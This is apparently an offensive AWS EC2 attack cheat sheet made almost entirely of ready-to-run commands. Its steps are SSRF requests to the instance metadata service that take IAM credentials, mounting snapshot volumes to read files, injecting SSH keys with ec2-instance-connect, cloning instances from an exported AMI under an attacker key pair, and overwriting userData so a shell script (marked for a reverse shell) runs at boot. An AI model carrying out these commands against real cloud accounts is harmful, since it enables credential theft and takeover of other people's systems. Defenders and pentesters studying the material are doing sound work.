- Port enumeration
- Attack interesting services like ssh or rdp
aws ec2 describe-instances aws ssm describe-instance-information aws ec2 describe-snapshots aws ec2 describe-security-groups --group-ids --region aws ec2 create-volume --snapshot-id snap-123123123 aws ec2 describe-snapshots --owner-ids {user-id}
ssh -i ".ssh/key.pem" @ sudo mount /dev/xvdb1 /mnt cat /mnt/home/ubuntu/setupNginx.sh
aws ec2 describe-security-groups aws ec2 describe-security-groups --filters Name=ip-permission.cidr,Values='0.0.0.0/0' --query "SecurityGroups[*].[GroupName]" --output text
SSRF to http://169.254.169.254 (Metadata server)
curl http:///?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/ http://169.254.169.254/latest/meta-data http://169.254.169.254/latest/meta-data/ami-id http://169.254.169.254/latest/meta-data/public-hostname http://169.254.169.254/latest/meta-data/public-keys/ http://169.254.169.254/latest/meta-data/network/interfaces/ http://169.254.169.254/latest/meta-data/local-ipv4 http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key/ http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/meta-data/ http://169.254.169.254/latest/meta-data/iam/ http://169.254.169.254/latest/meta-data/iam/security-credentials/
ec2-metadata -h
Append X-aws-ec2-metadata-token Header generated with a PUT request to http://169.254.169.254/latest/api/token
curl -s http:///latest/meta-data/ -H 'Host:169.254.169.254'
aws ec2 describe-instances | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}" aws ec2-instance-connect send-ssh-public-key --region us-east-1 --instance-id INSTANCE_WE_GOT_PREVIOUSLY --availability-zone zone --instance-os-user ubuntu --ssh-public-key file://shortkey.pub
aws ec2 describe-images --region specific-region aws ec2 create-image --instance-id ID --name "EXPLOIT" --description "Export AMI" --region specific-region aws ec2 import-key-pair --key-name "EXPLOIT" --public-key-material fileb:///publickeyfile aws ec2 describe-images --filters "Name=name,Values=EXPLOIT" aws ec2 run-instances --image-id {} --security-group-ids "" --subnet-id {} --count 1 --instance-type t2.micro --key-name EXPLOIT
aws ec2 create-volume –snapshot-id snapshot_id --availability-zone zone aws ec2 attach-volume --volume-id above-volume-id --instance-id instance-id --device /dev/sdf
aws ec2 modify-instance-attribute --instance-id=xxx --attribute userData --value file://file.b64.txt file.b64.txt contains (and after base64 file.txt > file.b64.txt):
Content-Type: multipart/mixed; boundary="//"
MIME-Version: 1.0
--//
Content-Type: text/cloud-config; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="cloud-config.txt"
#cloud-config
cloud_final_modules:
- [scripts-user, always]
--//
Content-Type: text/x-shellscript; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="userdata.txt"
#!/bin/bash
**commands here** (reverse shell, set ssh keys...)
--//
On first launch, the EC2 instance will pull the start_script from S3 and will run it. If an adversary can write to that location, they can escalate privileges or gain control of the EC2 instance.
#!/bin/bash aws s3 cp s3://example-boot-bucket/start_script.sh /root/start_script.sh chmod +x /root/start_script.sh /root/start_script.sh